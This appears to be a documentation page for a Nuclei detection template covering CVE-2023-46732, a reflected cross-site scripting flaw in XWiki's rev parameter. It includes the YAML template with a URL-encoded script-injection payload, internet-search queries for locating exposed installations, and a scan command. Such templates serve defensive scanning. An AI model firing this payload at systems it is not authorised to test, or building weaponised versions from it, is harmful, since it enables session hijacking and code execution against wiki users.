XWiki < 14.10.14 - Cross-Site Scripting
ID: CVE-2023-46732
Severity: medium
Author: ritikchaddha
Tags: cve,cve2024,xwiki,xss
Description
Section titled “Description”XWiki is vulnerable to reflected cross-site scripting (RXSS) via the rev parameter that is used in the content of the content menu without escaping. If an attacker can convince a user to visit a link with a crafted parameter, this allows the attacker to execute arbitrary actions in the name of the user, including remote code (Groovy) execution in the case of a user with programming right, compromising the confidentiality, integrity and availability of the whole XWiki installation.
YAML Source
Section titled “YAML Source”id: CVE-2023-46732
info: name: XWiki < 14.10.14 - Cross-Site Scripting author: ritikchaddha severity: medium description: | XWiki is vulnerable to reflected cross-site scripting (RXSS) via the rev parameter that is used in the content of the content menu without escaping. If an attacker can convince a user to visit a link with a crafted parameter, this allows the attacker to execute arbitrary actions in the name of the user, including remote code (Groovy) execution in the case of a user with programming right, compromising the confidentiality, integrity and availability of the whole XWiki installation. impact: | Successful exploitation could lead to cross-site scripting attack. remediation: | This has been patched in XWiki 15.6 RC1, 15.5.1 and 14.10.14. reference: - https://jira.xwiki.org/browse/XWIKI-21095 - https://nvd.nist.gov/vuln/detail/CVE-2023-46732 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-46732 cwe-id: CWE-79 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2024,xwiki,xss
http: - method: GET path: - "{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e" - "{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"
stop-at-first-match: true matchers: - type: dsl dsl: - 'contains(body, "<script>alert(document.domain)</script>\" id=\"tmViewSource")' - 'contains(header, "text/html")' - 'status_code == 200' condition: and# digest: 4a0a004730450221009c528755b95797237e6ad74f04a08e4ea27ec93ba2b26f4a07eb7fce4cdf0b85022010e5872918e20cce21ab3e053e612430edb2b2e7a4c01c39940084aaad477cae:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-46732.yaml"